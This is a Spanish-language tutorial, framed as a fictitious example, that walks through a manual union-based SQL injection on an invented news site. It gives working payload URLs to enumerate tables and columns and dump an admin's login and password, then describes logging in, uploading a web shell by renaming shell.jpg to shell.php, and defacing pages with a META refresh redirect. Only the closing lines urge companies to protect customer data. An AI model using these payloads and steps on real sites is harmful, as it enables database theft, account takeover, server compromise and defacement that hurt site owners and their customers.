<Ejemplo ficticio ~ Basado en como seria un ataque basico real.
Imaginense encontramos una url vulnerable a Sqli, usando dorks, haciendo las pruebas tipicas y identificamos que un website es vulnerable en la variale 'not' asi ; http://sitiovulnerable.cl/noticias.php?not='
- Comenzamos a inyectar; ( De la forma mas basica y lenta; existe otras formas, incluso scripts que lo automatizan pero este ejemplo me basare en hacerlo a mano buscando tabla por tabla )
http://sitiovulnerable.cl/noticias.php?not=-1+union+select+1--
http://sitiovulnerable.cl/noticias.php?not=-1+union+select+1,2--
http://sitiovulnerable.cl/noticias.php?not=-1+union+select+1,2,3--
http://sitiovulnerable.cl/noticias.php?not=-1+union+select+1,2,4,5--
*/ y nos ira mosstrando el siguietne mensaje : 'the used SELECT statements have a different number of columns '
Lo que estamos haciendo ahora es obtener el numero de tablas que hay en la pagina y encontrar la vulnerable. y seguimos buscando hasta quela encontramos por ejemplo en 6.
http://sitiovulnerable.cl/noticias.php?not=-1+union+select+1,2,4,5,6-- ---> vulnerable !
Nos daremos cuenta porque apareceRA el website deformado y mostrando el numero de la tabla vulnerable como "mas grande".
y comenzmos a inyectar suponiendo que la tabla 6 es la vulnerable.;
http://sitiovulnerable.cl/noticias.php?not=-1+union+select+1,2,4,5,replace%28group_concat%28table_name%29,0x2C,0x3C62723E%29+from+information_schema.tables--
y nos mostrara una lista de las tablas contenidas en la base de datos, por ejemplo:
BAN_STATISTICS
CHARACTER_SETS
COLUMNS
COLUMNS_PRIVILEGES
ENGINES
SCHEMATA
VIEWS
...
...
...
wp_comments
wp_links
wp_options
wp_user
Y encontramos una tabla relacionada con usuario. 'wp_user'
y le sacaremos las columnas ; seguimos inyectando;
http://sitiovulnerable.cl/noticias.php?not=-1+union+select+1,2,4,5,replace%28group_concat%28columns_name%29,0x2C,0x3C62723E%29+from+information_schema.columns+where+table_name=0x77705f75736572--
77705f75736572 no es mas que wp_user en hexadecimal.
y obtenemos el siguiente resutlado:
id
login
email
password
telefono
etc.
Y ahora vamos a buscar los puntos interesantes para alguien que quisiera entrar al sitio:
http://sitiovulnerable.cl/noticias.php?not=-1+union+select+1,2,4,5,replace%28group_concat%28id,login,email,password,telefono%29,0x2C,0x3C62723E%29+from+wp_user--
y listo obtenemos lo inserto en la consulta:
1 admin admin@web.cl dios2012 02-XXXXXXX
Luego buscamos el login del admin, puede estar en diversos lugares es solo cosa de buscar y lo encontramos en http://sitiovulnerable.cl/admin
en login ponemos: admin y como pass: dios2012
y listo estamos dentro.
Etando dentro podemos hacer varias cosas:
- Tratar de bypasear el upload de imagenes que debe haber y subir una shell cambiando las cabezeras y repitiendo el POST.
pasando de shell.jpg a shell.php .
-Si la programacion te lo permite el uso de, <META HTTP-EQUIV="refresh" CONTENT="1; url=http://www.owned.com"> en una noticia o publicacion que estuviera en el home
del sitio nos permitira redireccionar nuestra pagina apenas entramosa otro sitio en este caso a www.owned.com.
- bueno y varios metodos mas que nos sirven para hacer algun tipo de modificacion en el sitio o subir un archivo al servidor.
**********************************************************************************************************************************************************************
Asi como obtuvimos los datos del admins, tambien pudimos haber obtenido datos ingresados por clientes con sus ruts,nombres,telefonos,correos,incluso direccion
bases de datos completas que pueden user utilizadas para spam, phishing y muchas otras cosas que no serian agradables.-
Mas aun imagina que usas una clave uniersal para todo, como mucha gente lo hace porque asi no se olvida de la clave.
Tendriamos acceso a su correo, demasiada informacion suelta no?
*********************************************************************************************************************************************************************
Es por eso que las empresas, deberian entregar un minimo de seguridad a sus clientes, sino sus datos andaran por lugares que ni imaginas.
Y pensar que cada dato que ingresas a internet jamas saldra de ella, porque aunque eliminen la base de datos, alguien ya lo saco y lo subio en 30 sitios mas
Por eso es que deben cuidar donde ingresan sus datos, y mas aun el llamado es que las empresas deberian tomar conciencia y cuidar la privacidad de sus cleintes
brindandoles un real ambiente seguro,y no solo de adorno, ademas hacerse responsables del manejo de la informacion.